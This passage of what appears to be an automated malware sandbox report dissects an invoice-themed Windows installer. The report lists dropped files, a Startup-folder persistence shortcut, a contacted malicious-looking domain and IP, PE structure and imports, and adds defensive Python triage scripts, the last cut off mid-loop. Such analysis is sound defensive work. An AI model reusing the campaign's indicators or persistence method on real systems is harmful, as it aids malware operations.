SHA-512: A960EC529E6889B0F3253869FC72C4F65615141D23F42D808DE99E192B89B15DBC24B1D37812DC89F68576662173F18BC047A46B92598567E8C7E37E51821AB0

Malicious: false

Reputation: low

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-string-l1-1-0.dll

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 24256

Entropy (8bit): 6.8602671281732635

Encrypted: false

MD5: E65F76759251845FA1E6A3CF41B5F231

SHA1: DE4517EB0D8B330D3C2717E786F485150CAF82EC

SHA-256: 034A8ABF2BF027AD950FDF8FBDF488188C8D02EBA8E160AA95DE376FF1F32FE6

SHA-512: AFC7D0A26B2FFEFB43846D621585FC35A2CE280EEF1D046DA5A327F20AE7B023CCEB2BFD64176787AB86A76567E233215427686243E62ECA5DED1AD14B19B5B5

Malicious: false

Reputation: low


C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-time-l1-1-0.dll

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 20672

Entropy (8bit): 7.0106564368261175

Encrypted: false

MD5: 1622347A34EBA068916713CF28F46B67

SHA1: 18B3960E88118195F17C4BEF47DF1F7935CEE459

SHA-256: 9766C4200B3F51630097FCE8D4F10B33383E663601802ADA72660604876C99E9

SHA-512: 90B2398918487E0CCFE8F859AEE6E729A4063A110204644A75649331F10895B6C4DE09E57B6E20E8FAC04AC413F54A82889E602D05F5F42690B87D9C2253FA2E

Malicious: false

Reputation: low

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-utility-l1-1-0.dll

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 18624

Entropy (8bit): 7.127398472524706

Encrypted: false

MD5: F7AF6BB63229721005C8AC85DC86F5C2

SHA1: 35DDD88FBEA433A7E934AB0CA64907F8B0A85D9A

SHA-256: FA10F7E2AB54C2EBCD4688E39BC4AF1544FA21B73BE7FD0562B3FF7CFF041F7A

SHA-512: E4F242EC6204DD481EA5B8B1EDBFB9A7C8B136D9869FB85868325B21248AA170FECDF43075361E188B20A6F138F3760226B4CFB302929E04CD3901E6CB03961A

Malicious: false

Reputation: low

C:\Users\user\AppData\Roaming\F48A04623C4E0000\dependentlibs.list

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: ASCII text, with no line terminators

Size (bytes): 11

Entropy (8bit): 2.5503407095463886

Encrypted: false

MD5: E930CCBB2F833479DD58E27A9288E128

SHA1: D58BDF26572FD015652227C9DF78AA345F4A1F80

SHA-256: F039C6C3630501F9476043356BA47B050AFDE8D534438A7E3A7135D792484932

SHA-512: 3E42C62699C0B5D2343E6FE872B11D3AD8D75104F946EC09AA48B129F3C090EDCEC9FFAEDF143AF478838E515E4D4C14FE45390C9E3ED24A1E9EB0FC3F965A06

Malicious: false

Reputation: low

C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

Size (bytes): 531408

Entropy (8bit): 6.731849192407803

Encrypted: false

MD5: 52FFABA4273678BAE75442F2BC85B470

SHA1: 66A4C6CF92A4190A1480FD2B19AC84952FA715BD

SHA-256: 70225F14A28007815B0410B1F41F7EA6A16B6329FD69F7EC06386B05862CF5C4

SHA-512: 4D6E222378CC99B7CA64EC6738B97504201364760E94BA0276F272860608952E5A260B70A28246D6857404209C7B2ECEFD0C22EBA59B3788069DA7A1B39266F2

Malicious: true

Reputation: low

C:\Users\user\AppData\Roaming\F48A04623C4E0000\gaddafi-sarkozy-handshake.jpg

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: JPEG image data, JFIF standard 1.02

Size (bytes): 22117

Entropy (8bit): 7.966262180259871

Encrypted: false

MD5: 2EACE55C93918524BD2F8F06B4DDBEB3

SHA1: 8EB9A69D877C96603C2F26E895BF1DC89CF1927E

SHA-256: 667BE8442298610861B8561DA6E2F4005857D0AB076A3A8FF578D9B7E3DA729E

SHA-512: DE0D89C1AC2C5C99B8607E49D2F6AE7D6BE79748BE71DE5A74B6A193A92E4CB0C600230A3893AA9C595CB3632051876507F527EB4155FFFFA1A5E253EDC21755

Malicious: false

Reputation: low


C:\Users\user\AppData\Roaming\F48A04623C4E0000\mozglue.dll

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit

Size (bytes): 133072

Entropy (8bit): 6.814709386830881

Encrypted: false

MD5: E2F7B050C6C83505611807E81DB58E16

SHA1: A06A6FD60486E8B27E926F30B7D20FC7B2354EED

SHA-256: 9019976DF7D3423DCCEFF61397360BB300F693A1BF98E5BFD33AD3FBEADD24D8

SHA-512: EFB432A1389136A9F87B8834B9C78C1BAF953B84D338621E4841376D03B0A31D1F92186786C3CD8FB390A25A2ED77A2C0F1E3C49F73C57994EF684E552969407

Malicious: false

Reputation: low

C:\Users\user\AppData\Roaming\F48A04623C4E0000\msvcp140.dll

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 440120

Entropy (8bit): 6.655941426443587

Encrypted: false

MD5: D25C3FF7A4CBBFFC7C9FFF4F659051CE

SHA1: 02FE8D84D7F74C2721FF47D72A6916028C8F2E8A

SHA-256: 9C1DC36D319382E1501CDEAAE36BAD5B820EA84393EF6149E377D2FB2FC361A5

SHA-512: 945FE55B43326C95F1EEE643D46A53B69A463A88BD149F90E9E193D71B84F4875455D37FD4F06C1307BB2CDBE99C1F6E18CB33C0B8679CD11FEA820D7E728065

Malicious: false

Reputation: low

C:\Users\user\AppData\Roaming\F48A04623C4E0000\msvcr110.dll

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit

Size (bytes): 875472

Entropy (8bit): 6.9224404430053434

Encrypted: false

MD5: 4BA25D2CBE1587A841DCFB8C8C4A6EA6

SHA1: 52693D4B5E0B55A929099B680348C3932F2C3C62

SHA-256: B30160E759115E24425B9BCDF606EF6EBCE4657487525EDE7F1AC40B90FF7E49

SHA-512: 82E86EC67A5C6CDDF2230872F66560F4B0C3E4C1BB672507BBB8446A8D6F62512CBD0475FE23B619DB3A67BB870F4F742761CF1F87D50DB7F14076F54006F6C6

Malicious: false

Reputation: low

C:\Users\user\AppData\Roaming\F48A04623C4E0000\ucrtbase.dll

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 917184

Entropy (8bit): 6.825553978446455

Encrypted: false

MD5: D2C5233317767EE9329F470C39B046B1

SHA1: 42493597D3DED76DAA9A3C5CAD5D4343958D0D55

SHA-256: F085B1B009AB89049BA95DD4FFDE276D5B1F6FA0055F58DC3FC0D4B03AE8116D

SHA-512: 930B31042B5DDC507D4810C10677DB9786B8A16AD8A3ED09BA0A6256DDDC9C2706D1957ABBE3071D09C8CDCC2F142914AE7F7B727DC3E9F8DD7D821D118B715A

Malicious: false

Reputation: low

C:\Users\user\AppData\Roaming\F48A04623C4E0000\vcruntime140.dll

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 83784

Entropy (8bit): 6.845861669519175

Encrypted: false

MD5: A2523EA6950E248CBDF18C9EA1A844F6

SHA1: 549C8C2A96605F90D79A872BE73EFB5D40965444

SHA-256: 6823B98C3E922490A2F97F54862D32193900077E49F0360522B19E06E6DA24B4

SHA-512: 2141C041B6BDBEE9EC10088B9D47DF02BF72143EB3619E8652296D617EFD77697F4DC8727D11998695768843B4E94A47B1AED2C6FB9F097FFC8A42CA7AAAF66A

Malicious: false

Reputation: low


C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\F48A04623C4E0000.lnk

Process: C:\Windows\System32\dllhost.exe

File Type: MS Windows shortcut

Size (bytes): 45708

Entropy (8bit): 4.844147996064094

Encrypted: false

MD5: 1BFBBC1E738037DE253A92FBC49958B1

SHA1: 6783B0E8925F4E90999D008EA91199B9A7C79F8C

SHA-256: 2B2F1BC291F409405FCB4295B5B8ACC272DBAA70E937A0E37C520736E8433789

SHA-512: 3F5155619C8DCF7CB34065802BFD3E3DD773D2EDF04C781AFA1FE817877823EE1E45072F443BEB43148B43A9BA4D80CDEDC0F9285F7A0DAE9E40F491F6393A4E

Malicious: false

Reputation: low

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\user.js

Process: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

File Type: ASCII text, with CRLF line terminators

Size (bytes): 368

Entropy (8bit): 4.853586373412553

Encrypted: false

MD5: 57C038EDE79531E703D70493E88B584D

SHA1: 0DA5ED227B04E5C06B87A3081E0BF39D78903E7B

SHA-256: A8BBDEC0446B8CA598C2717A0EC7EABBC42ED2CDC6E2FA5E902645B0904263BA

SHA-512: ADBA59C02A7BC21AEAD4A557F18A054E53F5329CF01B72B7C626BE0536BB58A0AC2D5E70BA0CCF47FD7A1DCC739C8EFD509B6FCD7C9A6CDD7AC1ADB2497AC5BF

Malicious: false

Reputation: low

Contacted Domains/Contacted IPs

Contacted Domains

Name IP Active Malicious Antivirus Detection Reputation

truand-2-la-galere.money 91.92.137.74 true false unknown

Contacted IPs

[World map of contacted IPs by country, not reproduced in this extraction; legend: No. of IPs < 25%, 25% < No. of IPs < 50%, 50% < No. of IPs < 75%, 75% < No. of IPs]

Public

IP Country Flag ASN ASN Name Malicious

91.92.137.74 Bulgaria 203543 RT-ELECTRONICS-2015GazInvestProektltdBG false

Private

IP

Static File Info

General

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

Entropy (8bit): 7.964395891908483

TrID:
Win32 Executable (generic) a (10002005/4) 99.92%
Win16/32 Executable Delphi generic (2074/23) 0.02%
Generic Win/DOS Executable (2004/3) 0.02%
DOS Executable Generic (2002/1) 0.02%
Java Script embedded in Visual Basic Script (1500/0) 0.01%

File name: facture_1398665.exe

File size: 2153784

MD5: fe1214a06ffc40b1ebb524f185894487

SHA1: 237b14d2aab873fed20574bd708d6840ce87a76b

SHA256: cc3674f980fda4895865507f4ebe460b7553ace60b70e2d0dea0807c68003f7b

SHA512: 29bb6fab2a6c1680dbf5440d7e4b3a96ac474b57ce4e055bffd96f928b00655c79fd1faaebd2a24fca19790183f998ccdde09a3f33b01f686cc7704ac7c664cf

File Content Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon

Static PE Info

General

Entrypoint: 0x4117dc

Entrypoint Section: .itext

Digitally signed: false

Imagebase: 0x400000

Subsystem: windows gui

Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI, RELOCS_STRIPPED

DLL Characteristics: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Time Stamp: 0x57051F88 [Wed Apr 06 14:39:04 2016 UTC]

TLS Callbacks:

CLR (.Net) Version:

OS Version Major: 5

OS Version Minor: 0

File Version Major: 5

File Version Minor: 0

Subsystem Version Major: 5

Subsystem Version Minor: 0

Import Hash: 20dd26497880c05caed9305b3c8b9109

Entrypoint Preview

Instruction

push ebp

mov ebp, esp

add esp, FFFFFFA4h


push ebx

push esi

push edi

xor eax, eax

mov dword ptr [ebp-3Ch], eax

mov dword ptr [ebp-40h], eax

mov dword ptr [ebp-5Ch], eax

mov dword ptr [ebp-30h], eax

mov dword ptr [ebp-38h], eax

mov dword ptr [ebp-34h], eax

mov dword ptr [ebp-2Ch], eax

mov dword ptr [ebp-28h], eax

mov dword ptr [ebp-14h], eax

mov eax, 00410144h

call 0FB7B77Dh

xor eax, eax

push ebp

push 00411EBEh

push dword ptr fs:[eax]

mov dword ptr fs:[eax], esp

xor edx, edx

push ebp

push 00411E7Ah

push dword ptr fs:[edx]

mov dword ptr fs:[edx], esp

mov eax, dword ptr [00415B48h]

call 0FB83EC3h

call 0FB83A12h

cmp byte ptr [00412ADCh], 00000000h

je 0FB869BEh

call 0FB83FD8h

xor eax, eax

call 0FB79815h

lea edx, dword ptr [ebp-14h]

xor eax, eax

call 0FB80A5Bh

mov edx, dword ptr [ebp-14h]

mov eax, 00418658h

call 0FB79DEAh

push 00000002h

push 00000000h

push 00000001h

mov ecx, dword ptr [00418658h]

mov dl, 01h

mov eax, dword ptr [0040C04Ch]

call 0FB81372h

mov dword ptr [0041865Ch], eax

xor edx, edx

push ebp

push 00411E26h

push dword ptr fs:[edx]

mov dword ptr fs:[edx], esp

call 0FB83F36h

mov dword ptr [00418664h], eax

mov eax, dword ptr [00418664h]

Data Directories

Name Virtual Address Virtual Size Is in Section

IMAGE_DIRECTORY_ENTRY_EXPORT 0x0 0x0

IMAGE_DIRECTORY_ENTRY_IMPORT 0x19000 0xe04 .idata

IMAGE_DIRECTORY_ENTRY_RESOURCE 0x1c000 0x1708c .rsrc

IMAGE_DIRECTORY_ENTRY_EXCEPTION 0x0 0x0

IMAGE_DIRECTORY_ENTRY_SECURITY 0x0 0x0

IMAGE_DIRECTORY_ENTRY_BASERELOC 0x0 0x0

IMAGE_DIRECTORY_ENTRY_DEBUG 0x0 0x0

IMAGE_DIRECTORY_ENTRY_COPYRIGHT 0x0 0x0


IMAGE_DIRECTORY_ENTRY_GLOBALPTR 0x0 0x0

IMAGE_DIRECTORY_ENTRY_TLS 0x1b000 0x18 .rdata

IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG 0x0 0x0

IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT 0x0 0x0

IMAGE_DIRECTORY_ENTRY_IAT 0x19304 0x214 .idata

IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT 0x0 0x0

IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR 0x0 0x0

IMAGE_DIRECTORY_ENTRY_RESERVED 0x0 0x0

Name Virtual Address Virtual Size Is in Section
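As an added, runnable illustration of how the Data Directories table above and the Sections table that follows are produced (this is editor's example code, not Joe Sandbox's implementation), the pure-stdlib Python below walks the PE headers, resolves each data directory RVA to the section that contains it (the "Is in Section" column), decodes the section characteristics into the IMAGE_SCN_* names used in the report, and computes the per-section Shannon entropy. The two-section image it parses is constructed inline so it runs offline; the 7.0 entropy threshold in the triage helper is a common packer heuristic, not a value taken from the report.

```python
import math
import struct

# Names of the 16 data-directory slots, in IMAGE_DIRECTORY_ENTRY_* order (as the report labels them).
DIRECTORY_NAMES = [
    "EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASELOC_PLACEHOLDER",
    "DEBUG", "COPYRIGHT", "GLOBALPTR", "TLS", "LOAD_CONFIG", "BOUND_IMPORT",
    "IAT", "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED",
]
DIRECTORY_NAMES[5] = "BASERELOC"

# Section characteristics bits shown in the report's Characteristics column.
SECTION_FLAGS = {
    0x00000020: "IMAGE_SCN_CNT_CODE",
    0x00000040: "IMAGE_SCN_CNT_INITIALIZED_DATA",
    0x00000080: "IMAGE_SCN_CNT_UNINITIALIZED_DATA",
    0x20000000: "IMAGE_SCN_MEM_EXECUTE",
    0x40000000: "IMAGE_SCN_MEM_READ",
    0x80000000: "IMAGE_SCN_MEM_WRITE",
}


def shannon_entropy(data):
    """Bits per byte; 0.0 for empty input, 8.0 when every byte value is equally frequent."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def section_for_rva(sections, rva):
    """Name of the section whose virtual range contains rva, or '' if none does."""
    for s in sections:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
            return s["name"]
    return ""


def parse_pe(data):
    """Parse DOS/NT headers and return (data_directories, sections) as lists of dicts."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _machine, nsections, _ts, _symptr, _nsyms, opt_size, _chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:        # PE32: NumberOfRvaAndSizes at +92, directory table at +96
        ndirs_off, dirs_off = opt + 92, opt + 96
    elif magic == 0x20B:      # PE32+: the 64-bit ImageBase/stack/heap fields shift them by 16
        ndirs_off, dirs_off = opt + 108, opt + 112
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    ndirs = struct.unpack_from("<I", data, ndirs_off)[0]

    sections = []
    sec_base = opt + opt_size                      # section table follows the optional header
    for i in range(nsections):
        (name, vsize, va, rawsize, rawptr, _reloc, _line, _nreloc, _nline,
         chars) = struct.unpack_from("<8sIIIIIIHHI", data, sec_base + 40 * i)
        raw = data[rawptr:rawptr + rawsize] if rawsize else b""   # .bss/.tls have no raw bytes
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "va": va, "vsize": vsize, "rawsize": rawsize,
            "entropy": shannon_entropy(raw),
            "flags": [n for bit, n in SECTION_FLAGS.items() if chars & bit],
        })

    directories = []
    for i in range(min(ndirs, 16)):
        rva, size = struct.unpack_from("<II", data, dirs_off + 8 * i)
        directories.append({"name": DIRECTORY_NAMES[i], "rva": rva, "size": size,
                            "section": section_for_rva(sections, rva) if rva else ""})
    return directories, sections


def suspicious_sections(sections, entropy_threshold=7.0):
    """Heuristic triage: writable+executable sections, and high-entropy (packed/encrypted) sections."""
    findings = []
    for s in sections:
        if "IMAGE_SCN_MEM_WRITE" in s["flags"] and "IMAGE_SCN_MEM_EXECUTE" in s["flags"]:
            findings.append((s["name"], "writable+executable"))
        if s["rawsize"] and s["entropy"] >= entropy_threshold:
            findings.append((s["name"], "high entropy"))
    return findings


def build_sample_pe():
    """Constructed two-section PE32 image for offline testing (not a file from the report)."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)               # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 224, 0x0102)   # i386, 2 sections, 224-byte optional header
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                             # PE32 magic
    struct.pack_into("<I", opt, 92, 16)                               # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * 1, 0x2000, 0x40)            # IMPORT directory lives in .data
    text = struct.pack("<8sIIIIIIHHI", b".text", 0x100, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    data = struct.pack("<8sIIIIIIHHI", b".data", 0x100, 0x2000, 0x200, 0x400, 0, 0, 0, 0, 0xC0000040)
    headers = dos + b"PE\0\0" + coff + bytes(opt) + text + data
    headers += b"\0" * (0x200 - len(headers))
    text_raw = bytes(range(256)) * 2      # uniform byte distribution -> entropy 8.0
    data_raw = b"\0" * 0x200              # all zero -> entropy 0.0
    return headers + text_raw + data_raw


if __name__ == "__main__":
    dirs, secs = parse_pe(build_sample_pe())
    for d in dirs:
        if d["rva"]:
            print("IMAGE_DIRECTORY_ENTRY_%s 0x%x 0x%x %s" % (d["name"], d["rva"], d["size"], d["section"]))
    for s in secs:
        print("%s 0x%x 0x%x 0x%x %.3f %s" % (s["name"], s["va"], s["vsize"], s["rawsize"],
                                           s["entropy"], ", ".join(s["flags"])))
    print(suspicious_sections(secs))
```

Run against the real sample, the same code reproduces the report's rows: the two zero-raw-size sections (.bss, .tls) come out with entropy 0.0, and no section here trips either heuristic.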

Sections

Name Virtual Address Virtual Size Raw Size Xored PE ZLIB Complexity File Type Entropy Characteristics
.text 0x1000 0xf244 0xf400 False 0.548171746926 data 6.37521350405 IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.itext 0x11000 0xf64 0x1000 False 0.55859375 DBase 3 data file with memo(s) (251723841 records) 5.73220066616 IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data 0x12000 0xc88 0xe00 False 0.253348214286 data 2.29672090879 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.bss 0x13000 0x56bc 0x0 False 0 empty 0.0 IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.idata 0x19000 0xe04 0x1000 False 0.321533203125 SysEx File - 4.59781255771 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.tls 0x1a000 0x8 0x0 False 0 empty 0.0 IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rdata 0x1b000 0x18 0x200 False 0.05078125 data 0.20448815744 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc 0x1c000 0x1708c 0x17200 False 0.500242820946 data 6.25860342437 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

The File Type column is a magic-number guess on the raw section bytes; "DBase 3 data file" for .itext and "SysEx File" for .idata are false matches on binary data, not real content. The section layout (.text/.itext/.data/.bss/.idata/.tls/.rdata/.rsrc) is the standard Delphi linker layout. No section is both writable and executable, and the highest entropy (6.38 for .text) is in the normal range for uncompressed native code, so the loader itself shows no sign of a packer. Inno Setup appends its compressed payload as overlay data after the last section, outside anything this table measures, so the absence of a high-entropy section says nothing about what the installer carries.

Resources

Name RVA Size Type Language Country
RT_ICON 0x1c4dc 0x2e3d PNG image, 256 x 256, 8-bit colormap, non-interlaced English United States
RT_ICON 0x1f31c 0xea8 data English United States
RT_ICON 0x201c4 0x8a8 data English United States
RT_ICON 0x20a6c 0x568 GLS_BINARY_LSB_FIRST English United States
RT_ICON 0x20fd4 0x4b87 PNG image, 256 x 256, 8-bit/color RGBA, non-interlaced English United States
RT_ICON 0x25b5c 0x25a8 data English United States
RT_ICON 0x28104 0x10a8 data English United States
RT_ICON 0x291ac 0x468 GLS_BINARY_LSB_FIRST English United States
RT_STRING 0x29614 0x68 DBase 3 index file
RT_STRING 0x2967c 0xd4 data
RT_STRING 0x29750 0xa4 DBase 3 data file (7929953 records)
RT_STRING 0x297f4 0x2ac data
RT_STRING 0x29aa0 0x34c data
RT_STRING 0x29dec 0x294 data
RT_RCDATA 0x2a080 0x82e8 data English United States
RT_RCDATA 0x32368 0x10 Sendmail frozen configuration
RT_RCDATA 0x32378 0x150 data
RT_RCDATA 0x324c8 0x2c data
RT_GROUP_ICON 0x324f4 0x76 MS Windows icon resource - 8 icons, 256-colors English United States
RT_VERSION 0x3256c 0x4f4 data English United States
RT_MANIFEST 0x32a60 0x62c XML document text English United States

As in the Sections table, the Type column is a magic guess; the DBase and Sendmail labels on small RT_STRING and RT_RCDATA blobs are false matches.

Imports

DLL Import
oleaut32.dll SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll RegQueryValueExW, RegOpenKeyExW, RegCloseKey
user32.dll GetKeyboardType, LoadStringW, MessageBoxA, CharNextW
kernel32.dll GetACP, Sleep, VirtualFree, VirtualAlloc, GetSystemInfo, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenW, lstrcpynW, LoadLibraryExW, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetCommandLineW, FreeLibrary, FindFirstFileW, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle, CloseHandle
kernel32.dll TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleW
user32.dll CreateWindowExW, TranslateMessage, SetWindowLongW, PeekMessageW, MsgWaitForMultipleObjects, MessageBoxW, LoadStringW, GetSystemMetrics, ExitWindowsEx, DispatchMessageW, DestroyWindow, CharUpperBuffW, CallWindowProcW
kernel32.dll WriteFile, WideCharToMultiByte, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, SizeofResource, SignalObjectAndWait, SetLastError, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, RemoveDirectoryW, ReadFile, MultiByteToWideChar, LockResource, LoadResource, LoadLibraryW, GetWindowsDirectoryW, GetVersionExW, GetVersion, GetUserDefaultLangID, GetThreadLocale, GetSystemInfo, GetSystemDirectoryW, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesW, GetExitCodeProcess, GetEnvironmentVariableW, GetDiskFreeSpaceW, GetCurrentProcess, GetCommandLineW, GetCPInfo, InterlockedExchange, InterlockedCompareExchange, FreeLibrary, FormatMessageW, FindResourceW, EnumCalendarInfoW, DeleteFileW, CreateProcessW, CreateFileW, CreateEventW, CreateDirectoryW, CloseHandle
advapi32.dll RegQueryValueExW, RegOpenKeyExW, RegCloseKey, OpenProcessToken, LookupPrivilegeValueW
comctl32.dll InitCommonControls
kernel32.dll Sleep
advapi32.dll AdjustTokenPrivileges

Each DLL appears several times because the Delphi linker emits one import descriptor per unit that references it; this is normal for Delphi binaries and not an attempt to obscure imports. The two signatures quoted in the page header map directly onto this table: OpenProcessToken, LookupPrivilegeValueW and AdjustTokenPrivileges together are "adjust token privileges", and GetDiskFreeSpaceW is "check free disk space". Which privilege is requested is not visible from the import table (LookupPrivilegeValueW takes the name as a string argument); Inno Setup uses this sequence to enable SeShutdownPrivilege, which ExitWindowsEx (also imported here) requires to restart the machine after installation, and an installer checking free space on the target drive is equally ordinary. On their own these imports therefore say nothing about whether the payload is malicious; the verdict has to rest on what the installer drops and on the network behaviour.

Network Behavior

Network Port Distribution
Total Packets: 695
• 443 (HTTPS)
• 53 (DNS)
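The signature names in this report are produced by matching API combinations against the import table. As an added example (editor's code, not Joe Sandbox's rule engine), the script below parses import rows in the "dll.dll Name, Name, ..." format of the Imports table above, merges the repeated per-DLL entries, and evaluates a small rule set in which every API in a rule must be present. The embedded rows are an abbreviated subset of this sample's real import table; the rule names, the remote-injection rule (included so one rule visibly fails to match) and the "installer baseline" set that suppresses capabilities any setup program needs are the example's own choices.

```python
# Subset of the sample's import table from the report, abbreviated to the APIs the rules
# below look at (the real rows carry more names); format is "dll.dll Name, Name, ...".
REPORT_IMPORTS = """\
advapi32.dll RegQueryValueExW, RegOpenKeyExW, RegCloseKey
user32.dll GetKeyboardType, LoadStringW, MessageBoxA, CharNextW
kernel32.dll GetACP, Sleep, VirtualFree, VirtualAlloc, LoadLibraryExW, GetProcAddress, WriteFile, CloseHandle
user32.dll CreateWindowExW, MessageBoxW, ExitWindowsEx, DispatchMessageW
kernel32.dll WriteFile, VirtualProtect, VirtualAlloc, GetDiskFreeSpaceW, DeleteFileW, CreateProcessW, CreateFileW, CreateDirectoryW
advapi32.dll RegQueryValueExW, RegOpenKeyExW, RegCloseKey, OpenProcessToken, LookupPrivilegeValueW
comctl32.dll InitCommonControls
kernel32.dll Sleep
advapi32.dll AdjustTokenPrivileges
"""

# Capability rules (example rule set, not the report's): every API in the set must be imported.
RULES = [
    ("adjust token privileges", {"OpenProcessToken", "LookupPrivilegeValueW", "AdjustTokenPrivileges"}),
    ("check free disk space", {"GetDiskFreeSpaceW"}),
    ("create process", {"CreateProcessW"}),
    ("drop and delete files", {"CreateFileW", "WriteFile", "DeleteFileW"}),
    ("reboot or log off", {"ExitWindowsEx"}),
    ("change memory protection", {"VirtualAlloc", "VirtualProtect"}),
    ("runtime API resolution", {"LoadLibraryExW", "GetProcAddress"}),
    ("read registry", {"RegOpenKeyExW", "RegQueryValueExW"}),
    ("inject code into a remote process", {"OpenProcess", "VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread"}),
]

# Capabilities an installer stub legitimately needs; a match on these alone is weak evidence.
INSTALLER_BASELINE = {
    "adjust token privileges", "check free disk space", "create process",
    "drop and delete files", "reboot or log off", "read registry",
}


def parse_imports(text):
    """'dll.dll A, B, C' lines -> {dll: {A, B, C}}; repeated DLL lines are merged."""
    imports = {}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        dll, _, names = line.partition(" ")
        imports.setdefault(dll.lower(), set()).update(n.strip() for n in names.split(",") if n.strip())
    return imports


def all_apis(imports):
    """Flatten the per-DLL sets into one set of imported names."""
    return set().union(*imports.values()) if imports else set()


def match_capabilities(imports):
    """Return [(capability, sorted APIs that satisfied it)] for every rule fully present."""
    apis = all_apis(imports)
    return [(cap, sorted(need)) for cap, need in RULES if need <= apis]


def triage(text, installer=False):
    """Capabilities found, and those left after removing what an installer is expected to do."""
    caps = [cap for cap, _ in match_capabilities(parse_imports(text))]
    beyond = [c for c in caps if not (installer and c in INSTALLER_BASELINE)]
    return {"capabilities": caps, "beyond_installer_baseline": beyond}


if __name__ == "__main__":
    for cap, apis in match_capabilities(parse_imports(REPORT_IMPORTS)):
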